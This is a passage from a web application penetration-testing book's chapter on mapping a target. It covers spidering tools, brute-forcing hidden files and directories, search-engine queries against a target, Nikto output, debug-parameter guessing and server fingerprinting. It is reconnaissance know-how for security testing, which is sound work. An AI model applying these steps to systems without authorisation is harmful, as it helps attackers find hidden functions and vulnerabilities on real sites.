a higher level of coverage by also parsing HTML forms and submitting these

back to the application using various preset or random values. This can enable

them to walk through multistage functionality, and to follow forms-based nav-

igation (e.g., where drop-down lists are used as content menus). Some tools

also perform some parsing of client-side JavaScript to extract URLs pointing to

further content. The following free tools all do a decent job of enumerating

application content and functionality (see Chapter 19 for a detailed analysis of

their capabilities):

■■

Paros

■■

Burp Spider (part of Burp Suite)

■■

WebScarab

Figure 4-1 shows the results of using Burp Spider to map part of an application.

TIP Many web servers contain a file named robots.txt in the web root,

which contains a list of URLs that the site does not wish web spiders to visit or

search engines to index. Sometimes, this file contains references to sensitive

functionality, which you are certainly interested in spidering. Some spidering

tools designed for attacking web applications will check for the robots.txt

file and use all URLs within it as seeds in the spidering process.

62 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 62

Figure 4-1: Mapping part of an application using Burp Spider

While it can often be effective, there are some important limitations of this

kind of fully automated approach to content enumeration:

■■

Unusual navigation mechanisms (such as menus dynamically created

and handled using complicated JavaScript code) are often not handled

properly by these tools, and so they may miss whole areas of an appli-

cation.

■■

Multistage functionality often implements fine-grained input validation

checks, which do not accept the values that may be submitted by an auto-

mated tool. For example, a user registration form may contain fields for

name, email address, telephone number, and ZIP code. An automated

application spider will typically submit a single test string in each

editable form field, and the application will return an error message say-

ing that one or more of the items submitted were invalid. Because the spi-

der is not intelligent enough to understand and act upon this message, it

will not proceed past the registration form and so will not discover any

further content or functions accessible beyond it.

■■

Automated spiders typically use URLs as identifiers of unique content.

To avoid continuing spidering indefinitely, they recognize when linked

content has already been requested and do not request it again. How-

ever, many applications use forms-based navigation in which the same

URL may return very different content and functions. For example, a

Chapter 4 ■ Mapping the Application 63

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 63

banking application may implement every user action via a POST

request to /account.jsp, and use parameters to communicate the

action being performed. If a spider refuses to make multiple requests to

this URL, it will miss most of the application’s content. Some applica-

tion spiders attempt to handle this situation (for example, Burp Spider

can be configured to individuate form submissions based on parameter

names and values); however, there may still be situations where a fully

automated approach is not completely effective.

■■

Conversely to the previous point, some applications place volatile data

within URLs that is not actually used to identify resources or functions

(for example, parameters containing timers or random number seeds).

Each page of the application may contain what appears to be a new set

of URLs that the spider must request, causing it to continue running

indefinitely.

■■

Where an application uses authentication, an effective application spi-

der must be able to handle this in order to access the functionality that

it protects. The spiders mentioned previously can achieve this, by man-

ually configuring them either with a token for an authenticated session

or with credentials to submit to the login function. However, even

when this is done, it is common to find that the operation of the spider

breaks the authenticated session for various reasons:

■■

By following all URLs, the spider will at some point request the

logout function, causing its session to break.

■■

If the spider submits invalid input to a sensitive function, the appli-

cation may defensively terminate the session.

■■

If the application uses per-page tokens, the spider will almost cer-

tainly fail to handle these properly by requesting pages out of their

expected sequence, probably causing the entire session to be termi-

nated.

WARNING In some applications, running even a simple web spider that

parses and requests links can be extremely dangerous. For example, an

application may contain administrative functionality that deletes users, shuts

down a database, restarts the server, and the like. If an application-aware

spider is used, great damage can be done if the spider discovers and uses

sensitive functionality. The authors have encountered an application that

included functionality to edit the actual content of the main application. This

functionality was discoverable via the site map and was not protected by any

access control. If an automated spider were run against this site, it would find

the edit function and begin sending arbitrary data, resulting in the main web

site being defaced in real time while the spider was running.

64 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 64

User-Directed Spidering

This is a more sophisticated and controlled technique, which is usually prefer-

able to automated spidering. Here, the user walks through the application in

the normal way using a standard browser, attempting to navigate through all

of the application’s functionality. As he does so, the resulting traffic is passed

through a tool combining an intercepting proxy and spider, which monitors all

requests and responses. The tool builds up a map of the application, incorpo-

rating all of the URLs visited by the browser, and also parses all of the applica-

tion’s responses in the same way as a normal application-aware spider and

updates the site map with the content and functionality it discovers. The spi-

ders within Burp Suite and WebScarab can be used in this way (see Chapter 19

for further information).

Compared with the basic spidering approach, this technique carries numer-

ous benefits:

■■

Where the application uses unusual or complex mechanisms for navi-

gation, the user can follow these using a browser in the normal way.

Any functions and content accessed by the user will be processed by

the proxy/spider tool.

■■

The user controls all data submitted to the application and can ensure

that data validation requirements are met.

■■

The user can log in to the application in the usual way, and ensure that

the authenticated session remains active throughout the mapping

process. If any action performed results in session termination, the user

can log in again and continue browsing.

■■

Any dangerous functionality, such as deleteUser.jsp, will be fully

enumerated and incorporated into the site map, because links to it will

be parsed out of the application’s responses. But the user can use his

discretion in deciding which functions to actually request or carry out.

TIP In addition to the proxy/spider tools just described, another range of

tools that are often useful during application mapping are the various browser

extensions that can perform HTTP and HTML analysis from within the browser

interface. For example, the IEWatch tool illustrated in Figure 4-2, which runs

within Microsoft Internet Explorer, monitors all details of requests and

responses, including headers, request parameters, and cookies, and analyzes

every application page to display links, scripts, forms, and thick-client

components. While all of this information can, of course, be viewed in

your intercepting proxy, having a second record of useful mapping data can

only help you better understand the application and enumerate all of its

functionality. See Chapter 19 for more information about tools of this kind.

Chapter 4 ■ Mapping the Application 65

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 65

Figure 4-2: IEWatch performing HTTP and HTML analysis from within the browser

HACK STEPS

■ Configure your browser to use either Burp or WebScarab as a local proxy

(see Chapter 19 for specific details about how to do this if you are unsure).

■ Browse the entire application normally, attempting to visit every single

link/URL you discover, submitting every single form, and proceeding

through all multistep functions to completion. Try browsing with

JavaScript enabled and disabled, and with cookies enabled and disabled.

Many applications can handle various browser configurations, and you

may reach different content and code paths within the application.

■ Review the site map generated by the proxy/spider tool, and identify any

application content or functions that you did not browse manually.

Establish how the spider enumerated each item — for example, in Burp

Spider, check the Linked From details. Using your browser, access the

item manually, so that the response from the server is parsed by the

proxy/spider tool to identify any further content. Continue this step

recursively until no further content or functionality is identified.

■ Optionally, tell the tool to actively spider the site using all of the already

enumerated content as a starting point. To do this, first identify any URLs

that are dangerous or likely to break the application session, and config-

ure the spider to exclude these from its scope. Run the spider and review

the results for any additional content that it discovers.

■ The site map generated by the proxy/spider tool contains a wealth of

information about the target application, which will be useful later in

identifying the various attack surfaces exposed by the application.

66 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 66

Discovering Hidden Content

It is very common for applications to contain content and functionality which

is not directly linked or reachable from the main visible content. A common

example of this is functionality that has been implemented for testing or

debugging purposes and has never been removed.

Another example arises where the application presents different functional-

ity to different categories of users (for example, anonymous users, authenti-

cated regular users, and administrators). Users at one privilege level who

perform exhaustive spidering of the application may miss functionality that is

visible to users at other levels. An attacker who discovers the functionality

may be able to exploit it to elevate her privileges within the application.

There are countless other cases in which interesting content and functional-

ity may exist that the mapping techniques previously described would not

identify, including:

■■

Backup copies of live files. In the case of dynamic pages, their file exten-

sion may have changed to one that is not mapped as executable,

enabling you to review the page source for vulnerabilities that can then

be exploited on the main page.

■■

Backup archives that contain a full snapshot of files within (or indeed

outside) the web root, possibly enabling you to easily identify all con-

tent and functionality within the application.

■■

New functionality that has been deployed to the server for testing but

not yet linked from the main application.

■■

Old versions of files that have not been removed from the server. In the

case of dynamic pages, these may contain vulnerabilities that have been

fixed in the current version but can still be exploited in the old version.

■■

Configuration and include files containing sensitive data such as data-

base credentials.

■■

Source files out of which the live application’s functionality has been

compiled.

■■

Log files that may contain sensitive information such as valid user-

names, session tokens, URLs visited, actions performed, and so on.

Effective discovery of hidden content requires a combination of automated

and manual techniques, and often relies upon a degree of luck.

Brute-Force Techniques

In Chapter 13, we will describe how automated techniques can be leveraged to

speed up just about any attack against an application. In the present context,

automation can be used to make huge numbers of requests to the web server,

attempting to guess the names or identifiers of hidden functionality.

Chapter 4 ■ Mapping the Application 67

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 67

For example, suppose that your user-directed spidering has identified the

following application content:

https://wahh-app.com/login.php

https://wahh-app.com/home/myaccount.php

https://wahh-app.com/home/logout.php

https://wahh-app.com/help/

https://wahh-app.com/register.php

https://wahh-app.com/menu.js

https://wahh-app.com/scripts/validate.js

The first step in an automated effort to identify hidden content might

involve the following requests, to locate additional directories:

https://wahh-app.com/access/

https://wahh-app.com/account/

https://wahh-app.com/accounts/

https://wahh-app.com/accounting/

https://wahh-app.com/admin/

https://wahh-app.com/agent/

https://wahh-app.com/agents/

...

Next, the following requests could be made, to locate additional pages:

https://wahh-app.com/access.php

https://wahh-app.com/account.php

https://wahh-app.com/accounts.php

https://wahh-app.com/accounting.php

https://wahh-app.com/admin.php

https://wahh-app.com/agent.php

https://wahh-app.com/agents.php

...

https://wahh-app.com/home/access.php

https://wahh-app.com/home/account.php

https://wahh-app.com/home/accounts.php

https://wahh-app.com/home/accounting.php

https://wahh-app.com/home/admin.php

https://wahh-app.com/home/agent.php

https://wahh-app.com/home/agents.php

...

NOTE Do not assume that the application will respond with “200 OK” if a

requested resource exists, and “404 Not Found” if it does not. Many

applications handle requests for nonexistent resources in a customized way,

often returning a bespoke error message and a 200 response code. Further,

some requests for existent resources may receive a non-200 response. The

following is a rough guide to the likely meaning of the response codes that you

may encounter during a brute-forcing exercise looking for hidden content:

■■

302 Found — If the redirect is to a login page, the resource may be

accessible only by authenticated users. If it is to an error message, this

may disclose a different reason. If it is to another location, the redirect

68 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 68

may be part of the application’s intended logic, and this should be

investigated further.

■■

400 Bad Request – The application may use a custom naming scheme

for directories and files within URLs, which a particular request has not

complied with. More likely, however, is that the wordlist you are using

contains some whitespace characters or other invalid syntax.

■■

401 Unauthorized or 403 Forbidden – This usually indicates that the

requested resource exists but may not be accessed by any user,

regardless of authentication status or privilege level. It often occurs when

directories are requested, and you may infer that the directory exists.

■■

500 Internal Server Error – During content discovery, this usually

indicates that the application expects certain parameters to be

submitted when requesting the resource.

The various possible responses that may indicate the presence of interesting

content mean that is difficult to write a fully automated script to output a list-

ing of valid resources. The best approach is to capture as much information as

possible about the application’s responses during the brute-force exercise, and

manually review it.

Burp Intruder can be used to iterate through a list of common directory

names and capture details of the server’s responses, which can be reviewed to

identify valid directories. Figure 4-3 shows Burp Intruder being configured to

probe for common directories residing at the web root.

Figure 4-3: Burp Intruder being configured to probe for common directories

Chapter 4 ■ Mapping the Application 69

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 69

When the attack has been executed, clicking on column headers such as

“status” and “length” will sort the results accordingly, enabling anomalies to

be quickly picked out, as shown in Figure 4-4.

Figure 4-4: The results of a test probing for common directories

HACK STEPS

■ Make some manual requests for known valid and invalid resources, and

identify how the server handles the latter.

■ Use the site map generated through user-directed spidering as a basis for

automated discovery of hidden content.

■ Make automated requests for common filenames and directories within

each directory or path known to exist within the application. Use Burp

Intruder or a custom script, together with wordlists of common files and

directories, to quickly generate large numbers of requests. If you have

identified a particular way in which the application handles requests for

invalid resources (e.g., a customized “file not found” page), configure

Intruder or your script to highlight these results so they can be ignored.

■ Capture the responses received from the server, and manually review

these to identify valid resources.

■ Perform the exercise recursively as new content is discovered.

Inference from Published Content

Most applications employ some kind of naming scheme for their content and

functionality. By inferring from the resources already identified within the

application, it is possible to fine-tune your automated enumeration exercise to

increase the likelihood of discovering further hidden content.

70 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 70

HACK STEPS

■ Review the results of your user-directed browsing and basic brute-force

exercises. Compile lists of the names of all enumerated subdirectories,

file stems, and file extensions.

■ Review these lists to identify any naming schemes in use. For example,

if there are pages called AddDocument.jsp and ViewDocument.jsp,

then there may also be pages called EditDocument.jsp and

RemoveDocument.jsp. You can often get a feel for the naming habits of

developers just by reading a few examples. For example, depending on

their personal style, developers may be verbose (AddANewUser.asp),

succinct (AddUser.asp), use abbreviations (AddUsr.asp), or even be

more cryptic (AddU.asp). Getting a feel for the naming styles in use may

help you guess the precise names of content that you have not already

identified.

■ Sometimes, the naming scheme used for different content employs

identifiers such as numbers and dates, which can make inferring hidden

content extremely easy. This is most commonly encountered in the

names of static resources, rather than dynamic scripts. For example,

if a company’s web site links to AnnualReport2004.pdf and Annual

Report2005.pdf, it ought to be a short step to identifying what the next

report will be called. Somewhat incredibly, there have been notorious

cases of companies placing files containing financial results onto their

web servers before these were publicly announced, only to have wily

journalists discover them based on the naming scheme used in earlier

years.

■ Review all client-side code such as HTML and JavaScript to identify any

clues about hidden server-side content. These may include HTML com-

ments relating to protected or unlinked functions, and HTML forms with

disabled SUBMIT elements, and the like. Often, comments are automati-

cally generated by the software that has been used to generate web con-

tent, or by the platform on which the application is running. References

to items such as server-side include files are of particular interest —

these files may actually be publicly downloadable and may contain

highly sensitive information such as database connection strings and

passwords. In other cases, developers’ comments may contain all kinds

of useful tidbits, such as database names, references to back-end com-

ponents, SQL query strings, and so on. Thick-client components such as

Java applets and ActiveX controls may also contain sensitive data that

you can extract. See Chapter 14 for further ways in which the application

may disclose information about itself.

(continued)

Chapter 4 ■ Mapping the Application 71

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 71

HACK STEPS (continued)

■ Add to the lists of enumerated items any further potential names conjec-

tured on the basis of these. Also add to the file extension list common

extensions such as txt, bak, src, inc, and old, which may uncover the

source to backup versions of live pages, as well as extensions associated

with the development languages in use, such as Java and cs, which may

uncover source files that have been compiled into live pages (see the tips

described later in this chapter for identifying technologies in use). The

Paros tool carries out this test when used to perform a vulnerability scan

(see Chapter 19).

■ Search for temporary files which may have been created inadvertently by

developer tools and file editors — for example, the .DS_Store file, which

contains a directory index under OSX, or file.php~1, which is a tempo-

rary file created when file.php is edited.

■ Perform further automated exercises, combining the lists of directories,

file stems, and file extensions to request large numbers of potential

resources. For example, in a given directory, request each file stem com-

bined with each file extension. Or request each directory name as a sub-

directory of every known directory.

■ Where a consistent naming scheme has been identified, consider per-

forming a more focused brute-force exercise on the basis of this. For

example, if AddDocument.jsp and ViewDocument.jsp are known to

exist, you may create a list of actions (edit, delete, create, etc.) and make

requests of the form XxxDocument.jsp. Alternatively, create a list of

types of item (user, account, file, etc.) and make requests of the form

AddXxx.jsp.

■ Perform each exercise recursively, using new enumerated content and

patterns as the basis for further user-directed spidering, and further

automated content discovery. You are limited only by your imagination,

time available, and the importance you attach to discovering hidden con-

tent within the application you are targeting.

Use of Public Information

There may be content and functionality within the application that is not

presently linked from its main content, but has been linked in the past. In this

situation, it is likely that various historical repositories will still contain refer-

ences to the hidden content. There are two main types of publicly available

resources that are useful here:

■■

Search engines such as Google, Yahoo and MSN. These maintain a

fine-grained index of all content which their powerful spiders have

72 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 72

discovered, and also cached copies of much of this content, which per-

sists even after the original content has been removed.

■■

Web archives such as the WayBack Machine located at

web.archive.org. These archives maintain a historical record of a very

large number of web sites, and in many cases allow users to browse a

fully replicated snapshot of a given site as it existed at various dates

going back several years.

In addition to content that has been linked in the past, these resources are

also likely to contain references to content that is linked from third-party sites,

but not from within the target application itself. For example, some applica-

tions contain restricted functionality for use by their business partners. Those

partners may disclose the existence of the functionality in ways that the appli-

cation itself does not.

HACK STEPS

■ Use several different search engines and web archives (listed previously)

to discover what content they indexed or stored for the application you

are attacking.

■ When querying a search engine, you can use various advanced tech-

niques to maximize the effectiveness of your research. The following sug-

gestions apply to Google — you can find the corresponding queries on

other engines by selecting their Advanced Search option:

■

site:www.wahh-target.com — This will return every resource within

the target site which Google has a reference to.

■

site:www.wahh-target.com login — This will return all of the

pages containing the expression login. In a very large and complex

application, this technique can be used to quickly home in on interest-

ing resources, such as site maps, password reset functions, adminis-

trative menus, and the like.

■

link:www.wahh-target.com — This will return all of the pages on

other web sites and applications that contain a link to the target. This

may include links to old content, or functionality that is intended for

use only by third parties, such as partner links.

■

related:www.wahh-target.com — This returns pages that are “simi-

lar” to the target, and so will include a lot of irrelevant material. How-

ever, it may also include discussion about the target on other sites,

which may be of interest.

■

For each search, perform it not only in the default Web section of

Google, but also Groups and News, which may contain different

results.

(continued)

Chapter 4 ■ Mapping the Application 73

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 73

HACK STEPS (continued)

■

Browse to the last page of search results for a given query, and select

Repeat the Search with the Omitted Results Included. By default,

Google attempts to filter out redundant results by removing pages that

it believes are sufficiently similar to others included in the results.

Overriding this behavior may uncover subtly different pages that are

of interest to you when attacking the application.

■

View the cached version of interesting pages, including any content

that is no longer present in the actual application. In some cases,

search engine caches contain resources that cannot be directly

accessed in the application without authentication or payment.

■

Perform the same queries on other domain names belonging to the

same organization, which may contain useful information about the

application you are targeting.

■ If your research identifies old content and functionality that is no longer

linked to within the main application, it may still be present and usable.

The old functionality may contain vulnerabilities that do not exist else-

where within the application.

■ Even where old content has been removed from the live application,

details about the content obtained from a search engine cache or web

archive may contain references to or clues about other functionality that is

still present within the live application, and that can be used to attack it.

A further public source of useful information about the target application is

any posts that developers and others have made to Internet forums. There are

numerous such forums in which software designers and programmers ask

and answer technical questions. Often, items posted to these forums will con-

tain information about an application that is of direct benefit to an attacker,

including the technologies in use, the functionality implemented, problems

encountered during development, known security bugs, configuration and

log files submitted to assist troubleshooting, and even extracts of source code.

HACK STEPS

■

Compile a list containing every name and email address you can discover

relating to the target application and its development. This should include

any known developers, names found within HTML source code, names found

in the contact information section of the main company web site, and any

names disclosed within the application itself, such as administrative staff.

■ Using the search techniques described previously, search for each identi-

fied name, to find any questions and answers they have posted to Inter-

net forums. Review any information found for clues about functionality

or vulnerabilities within the target application.

74 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 74

Leveraging the Web Server

Vulnerabilities may exist at the web server layer that enable you to discover

content and functionality that is not linked within the web application itself.

For example, there have been numerous bugs within web server software that

allow an attacker to list the contents of directories, or obtain the raw source for

dynamic server-executable pages. See Chapter 17 for some examples of these

vulnerabilities, and ways in which you can identify them. If such a bug exists,

you may be able to exploit it to directly obtain a listing of all pages and other

resources within the application.

Many web servers ship with default content that may assist you in attacking

them — for example, sample and diagnostic scripts that may contain known

vulnerabilities, or contain functionality that may be leveraged for some mali-

cious purpose. Further, many web applications incorporate common third-

party components that they use for various standard functions — for example,

scripts to implement a shopping cart or interface to email servers. Nikto is a

handy tool that issues requests for a wide range of default web server content,

third-party application components, and common directory names. While

Nikto will not rigorously test for any hidden bespoke functionality, it can often

be useful in discovering other resources that are not linked within the applica-

tion and that may be of interest in formulating an attack:

manicsprout@king nikto-1.35]# perl nikto.pl

-----------------------------------------------------------------------

- Nikto 1.34/1.29 - www.cirt.net

+ Target IP: 127.0.0.1

+ Target Hostname: localhost

+ Target Port: 80

+ Start Time: Sat Feb 3 12:03:36 2007

-----------------------------------------------------------------------

- Scan is dependent on “Server” string which can be faked, use -g to

override

+ Server ID string not sent

- Server did not understand HTTP 1.1, switching to HTTP 1.0

+ /bin/ - This might be interesting... (GET)

+ /client/ - This might be interesting... (GET)

+ /oracle - Redirects to /oracle/ , This might be interesting...

+ /temp/ - This might be interesting... (GET)

+ /cgi-bin/login.pl - This might be interesting... (GET)

+ 3198 items checked - 6 item(s) found on remote host(s)

+ End Time: Sat Feb 3 12:03:55 2007 (19 seconds)

-----------------------------------------------------------------------

+ 1 host(s) tested

Chapter 4 ■ Mapping the Application 75

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 75

HACK STEPS

There are several useful options available when running Nikto:

■ If you believe that the server is using a nonstandard location for interest-

ing content that Nikto checks for (for example /cgi/cgi-bin instead of

/cgi-bin) you can specify this alternate location using the option –root

/cgi/. For the specific case of CGI directories, these can also be speci-

fied using the option –Cgidirs.

■ If the site uses a custom “file not found” page that does not return the

HTTP 404 status code, you can specify a particular string that identifies

this page by using the -404 option.

■ Be aware that Nikto does not perform any intelligent verification of

potential issues and so is prone to report false positives. Always check

any results returned by Nikto manually.

Application Pages vs. Functional Paths

The enumeration techniques described so far have been implicitly driven by

one particular picture of how web application content may be conceptualized

and catalogued. This picture is inherited from the pre-application days of the

World Wide Web, in which web servers functioned as repositories of static

information, retrieved using URLs that were effectively filenames. To publish

some web content, an author simply generated a bunch of HTML files and

copied these into the relevant directory on a web server. When users followed

hyperlinks, they navigated around the set of files created by the author,

requesting each file via its name within the directory tree residing on the

server.

Although the evolution of web applications has fundamentally changed the

experience of interacting with the Web, the picture just described is still applic-

able to the majority of web application content and functionality. Individual

functions are typically accessed via a unique URL, which is usually the name

of the server-side script that implements the function. The parameters to the

request (residing in either the URL query string or the body of a

POST request)

do not tell the application what function to perform — they tell it what infor-

mation to use when performing it. In this context, the methodology of con-

structing a URL-based map can be effective in cataloging the functionality of

the application.

In some applications, however, the picture based on application “pages” is

inappropriate. While it may be logically possible to shoehorn any application’s

structure into this form of representation, there are many cases in which a

76 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 76

different picture, based on functional paths, is far more useful for cataloging

its content and functionality. Consider an application that is accessed using

only requests of the following form:

POST /bank.jsp HTTP/1.1

Host: wahh-bank.com

Content-Length: 106

servlet=TransferFunds&method=confirmTransfer&fromAccount=10372918&toAcco

unt=3910852&amount=291.23&Submit=Ok

Here, every request is made to a single URL. The parameters to the request

are used to tell the application what function to perform, by naming the Java

servlet and method to invoke. Further parameters provide the information to

use in performing the function. In the picture based on application pages, the

application will appear to have only a single function, and a URL-based map

will not elucidate its functionality. However, if we map the application in

terms of functional paths, we can obtain a much more informative and useful

catalogue of its functionality. Figure 4-5 is a partial map of the functional paths

that exist within the application.

Figure 4-5: A mapping of the functional paths within a web application

WahhBank.

home

TransferFunds.

selectAccounts

BillPayment.

addPayee

BillPayment.

selectPayee

TransferFunds.

enterAmount

BillPayment.

enterAmount

TransferFunds.

confirmTransfer

BillPayment.

confirmPayment

WahhBank.

logout

Chapter 4 ■ Mapping the Application 77

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 77

Representing an application’s functionality in this way is often more useful

even in cases where the usual picture based on application pages can be

applied without any problems. The logical relationships and dependencies

between different functions may not correspond to the directory structure

used within URLs. It is these logical relationships that are of most interest to

you, both in understanding the core functionality of the application, and in

formulating possible attacks against it. By identifying these, you can better

understand the expectations and assumptions of the application’s developers

when implementing the functions, and attempt to find ways of violating these

assumptions, causing unexpected behavior within the application.

In applications where functions are identified using a request parameter,

rather than the URL, this has implications for the enumeration of application

content. In the previous example, the content discovery exercises described so

far are unlikely to uncover any hidden content. Those techniques need to be

adapted to the mechanisms actually used by the application for accessing

functionality.

HACK STEPS

■ Identify any instances where application functionality is accessed not by

requesting a specific page for that function (e.g., /admin/editUser.jsp)

but by passing the name of a function in a parameter (e.g., /admin

.jsp?action=editUser).

■ Modify the automated techniques described for discovering URL-

specified content to work on the content-access mechanisms in use

within the application. For example, if the application uses parameters

which specify servlet and method names, first determine its behavior

when an invalid servlet and/or method is requested, and when a valid

method is requested with invalid other parameters. Try to identify attrib-

utes of the server’s responses that indicate “hits” — i.e., valid servlets and

methods. If possible, find a way of attacking the problem in two stages,

first enumerating servlets and then methods within these. Using a similar

method to the one used for URL-specified content, compile lists of com-

mon items, add to these by inferring from the names actually observed,

and generate large numbers of requests based on these.

■ If applicable, compile a map of application content based on functional

paths, showing all of the enumerated functions and the logical paths and

dependencies between them.

78 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 78

Discovering Hidden Parameters

A variation on the situation where an application uses request parameters to

specify which function should be performed arises where other parameters

are used to control the application’s logic in significant ways. For example, an

application may behave differently if the parameter

debug=true is added to

the query string of any URL — it might turn off certain input validation

checks, allow the user to bypass certain access controls, or display verbose

debug information in its response. In many cases, the fact that the application

handles this parameter cannot be directly inferred from any of its content (for

example, it does not include

debug=false in the URLs that it publishes as

hyperlinks). The effect of the parameter can only be detected by guessing a

range of values until the correct one is submitted.

HACK STEPS

■ Using lists of common debug parameter names (debug, test, hide, source,

etc.) and common values (true, yes, on, 1, etc.), make a large number of

requests to a known application page or function, iterating through all

permutations of name and value. For POST requests, insert the added

parameter both into the URL query string and into the message body.

■ Burp Intruder can be used to perform this test using multiple payload

sets and the “cluster bomb” attack type (see Chapter 13 for more

details).

■ Monitor all responses received to identify any anomalies that may indi-

cate that the added parameter has had an effect on the application’s

processing.

■ Depending on the time available, target a number of different pages or

functions for hidden parameter discovery. Choose functions where it is

most likely that developers have implemented debug logic, such as login,

search, file uploading and downloading, and the like.

Analyzing the Application

Enumerating as much of the application’s content as possible is only one ele-

ment of the mapping process. Equally important is the task of analyzing the

application’s functionality, behavior, and technologies employed, in order to

identify the key attack surfaces that it exposes, and begin formulating an

approach to probing the application for exploitable vulnerabilities.

Chapter 4 ■ Mapping the Application 79

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 79

Some key areas to investigate are:

■■

The core functionality of the application — the actions that it can be

leveraged to perform when used as intended.

■■

Other more peripheral behavior of the application, including off-site

links, error messages, administrative and logging functions, use of redi-

rects, and so on.

■■

The core security mechanisms and how they function, in particular

management of session state, access controls, and authentication mech-

anisms and supporting logic (user registration, password change,

account recovery, etc.).

■■

All of the different locations at which user-supplied input is processed

by the application — every URL, query string parameter, item of

POST

data, cookie, and the like.

■■

The technologies employed on the client side, including forms, client-

side scripts, thick-client components (Java applets, ActiveX controls,

and Flash), and cookies.

■■

The technologies employed on the server side, including static and

dynamic pages, the types of request parameters employed, use of SSL,

web server software, interaction with databases, email systems and

other back-end components.

■■

Any other details that may be gleaned about the internal structure and

functionality of the server-side application — the mechanisms it uses

behind the scenes to deliver the functionality and behavior that is visi-

ble from the client perspective.

Identifying Entry Points for User Input

The majority of ways in which the application captures user input for server-

side processing should be obvious when reviewing the HTTP requests that are

generated as you walk through the application’s functionality. The key loca-

tions to pay attention to are:

■■

Every URL string up to the query string marker.

■■

Every parameter submitted within the URL query string.

■■

Every parameter submitted within the body of a POST request.

■■

Every cookie.

■■

Every other HTTP header that in rare cases may be processed by the

application, in particular the

User-Agent, Referer, Accept, Accept-

Language

, and Host headers.

80 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 80

Some applications do not employ the standard query string format (which

was described in Chapter 3), but employ their own custom scheme, which

may use nonstandard query string markers and field separators, may embed

other data schemes such as XML within the query string, or may effectively

place the query string within what appears to be the directory or filename por-

tion of the URL. Here are some examples of nonstandard query string formats

that the authors have encountered in the wild:

■■

/dir/file;foo=bar&foo2=bar2

■■

/dir/file?foo=bar$foo2=bar2

■■

/dir/file/foo%3dbar%26foo2%3dbar2

■■

/dir/foo.bar/file

■■

/dir/foo=bar/file

■■

/dir/file?param=foo:bar

■■

/dir/file?data=

%3cfoo%3ebar%3c%2ffoo%3e%3cfoo2%3ebar2%3c%2ffoo2%3e

If a nonstandard query string format is being used, then you will need to

take account of this when probing the application for all kinds of common vul-

nerabilities. For example, when testing the final URL in this list, if you were to

ignore the custom format and simply treat the query string as containing a sin-

gle parameter called

data, and so submit various kinds of attack payloads as

the value of this parameter, you would miss many kinds of vulnerability that

may exist in the processing of the query string. If, conversely, you dissect the

format and place your payloads within the embedded XML data fields, you

may immediately discover a critical bug such as SQL injection or path

traversal.

A final class of entry points for user input includes any out-of-band channel

by which the application receives data that you may be able to control. Some

of these entry points may be entirely undetectable if you simply inspect the

HTTP traffic generated by the application, and finding them usually requires

an understanding of the wider context of the functionality that the application

implements. Some examples of web applications that receive user-controllable

data via an out-of-band channel include:

■■

A web mail application which processes and renders email messages

received via SMTP.

■■

A publishing application that contains a function to retrieve content via

HTTP from another server.

■■

An intrusion detection application that gathers data using a network

sniffer and presents this using a web application interface.

Chapter 4 ■ Mapping the Application 81

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 81

Identifying Server-Side Technologies

It is normally possible to fingerprint the technologies employed on the server

via various clues and indicators.

Banner Grabbing

Many web servers disclose fine-grained version information, both about the

web server software itself and about other components that have been

installed. For example, the HTTP

Server header discloses a huge amount of

detail about some installations:

Server: Apache/1.3.31 (Unix) mod_gzip/1.3.26.1a mod_auth_passthrough/1.8

mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.9 FrontPage/5.0.2.2634a

mod_ssl/2.8.20 OpenSSL/0.9.7a

In addition to the Server header, other locations where the type and version

of software may be disclosed are:

■■

Templates used to build HTML pages

■■

Custom HTTP headers

■■

URL query string parameters

HTTP Fingerprinting

In principle, any item of information returned by the server may be cus-

tomized or even deliberately falsified, and banners like the

Server header are

no exception. Some web server software includes a facility for administrators

to set an arbitrary value for the

Server header. Further, there are security prod-

ucts that use various methods to try to prevent a web server’s software from

being detected, such as ServerMask by Port80 Software.

Attempting to grab the server banner from Port80’s own web server does

not appear to disclose much useful information:

HEAD / HTTP/1.0

Host: www.port80software.com

HTTP/1.1 200 OK

Date: Sun, 04 Mar 2007 16:14:26 GMT

Server: Yes we are using ServerMask!

Set-Cookie: countrycode=UK; path=/

Set-Cookie: ALT.COOKIE.NAME.2=89QMSN102,S62OS21C51N2NP,,0105,N7; path=/

Cache-control: private

Content-Length: 27399

82 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 82

Connection: Keep-Alive

Content-Type: text/html

Set-Cookie: Coyote-2-d1f579d9=ac1000d9:0; path=/

Despite measures such as this, it is usually possible for a determined

attacker to use other aspects of the web server’s behavior to determine the

software in use, or at least narrow down the range of possibilities. The HTTP

specification contains a lot of detail that is optional or left to an implementer’s

discretion. Further, many web servers deviate from or extend the specification

in various different ways. As a result, there are numerous subtle ways in which

a web server can be fingerprinted, other than via its

Server banner. Httprint is

a handy tool that performs a number of tests in an attempt to fingerprint a web

server’s software. In the case of Port80 Software’s server, it reports with a 58%

degree of confidence that the server software in use is in fact Microsoft IIS ver-

sion 5.1, as shown in Figure 4-6.

Figure 4-6: Httprint fingerprinting various different web servers

The screenshot also illustrates how Httprint can defeat other kinds of

